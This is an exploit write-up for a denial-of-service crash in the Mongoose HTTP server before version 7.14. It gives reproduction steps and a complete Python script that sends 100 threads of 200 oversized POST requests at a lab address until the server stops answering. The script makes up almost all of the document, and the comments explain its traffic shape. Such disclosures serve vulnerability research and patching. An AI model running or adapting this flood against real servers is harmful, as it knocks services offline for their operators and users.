Mongoose HTTP Denial of Service
# Exploit Title: Mongoose HTTP < 7.14 DDOS Stack-Based Free()
# Discovered by: Yehia Elghaly
# Discovered Date: 2025-06-11
# Vendor Homepage: https://mongoose.ws/
# Software Link : https://github.com/cesanta/mongoose/tree/7.14
# Tested Version: < 7.14
# Vulnerability Type: DDOS Stack-Based
# Tested on OS: Windows 10 - Windows 11

# Steps to reproduce:
# 1. - Run Mongoose < 7.14
# 2. - Run the python script against it - the Mongoose server will crash

# Note: The bug didn't always cause a crash on the first test; you may need to run the python script a few times, because the result of free() on a stack address is undefined behavior. Sometimes it works. Sometimes it silently corrupts memory. Sometimes the heap manager doesn't detect it until it's too late.

# The vendor has been notified and has fixed the bug.

#!/usr/bin/python

import requests
import threading
import time

# Target and load shape for the reproduction run.
# URL is the lab host from the original write-up (a private RFC 1918 address);
# THREAD_COUNT workers each send REQUESTS_PER_THREAD POSTs whose body is
# LARGE_BODY, i.e. 100 x 200 requests carrying 10 000 bytes of "A" each.
URL = "http://192.168.166.131:8000"
THREAD_COUNT = 100
REQUESTS_PER_THREAD = 200
LARGE_BODY = "A" * 10_000

def make_requests(thread_id):
    """Send REQUESTS_PER_THREAD POST requests to URL from one worker thread.

    Each request carries LARGE_BODY as its body and gives up after a
    one-second timeout. Every outcome is printed with the *thread_id* tag:
    either the HTTP status code the server answered with, or the transport
    error (connection refused/reset, timeout) that prevented an answer.

    Args:
        thread_id: Integer label used only in the printed log lines.

    Returns:
        None. ``requests.exceptions.RequestException`` is caught and reported
        rather than raised, so the loop keeps going after the target stops
        answering; the printed "failed" lines are how the operator sees that
        the server went down.

    NOTE(review): the request itself is ordinary HTTP; the crash the header
    attributes to Mongoose is on the server side and is not controlled by
    anything in this body beyond its size and volume.
    """
    for index in range(REQUESTS_PER_THREAD):
        number = index + 1  # 1-based counter for the log line
        try:
            response = requests.post(URL, data=LARGE_BODY, timeout=1)
        except requests.exceptions.RequestException as err:
            print(f"[Thread {thread_id}] Request {number} failed: {err}")
        else:
            print(f"[Thread {thread_id}] Request {number}: {response.status_code}")

# Fan out THREAD_COUNT workers, each running make_requests, then wait for all
# of them. With the constants above this is 100 concurrent clients sending 200
# oversized POST bodies each from one source address -- the traffic shape a
# request-body size limit or a per-client connection cap is meant to absorb.
threads = []
start_time = time.time()
for worker_id in range(THREAD_COUNT):
    worker = threading.Thread(target=make_requests, args=(worker_id,))
    threads.append(worker)
    worker.start()

# Block until every worker has finished its request loop before reporting the
# total wall-clock time for the run.
for worker in threads:
    worker.join()

print(f"Completed in {time.time() - start_time:.2f} seconds")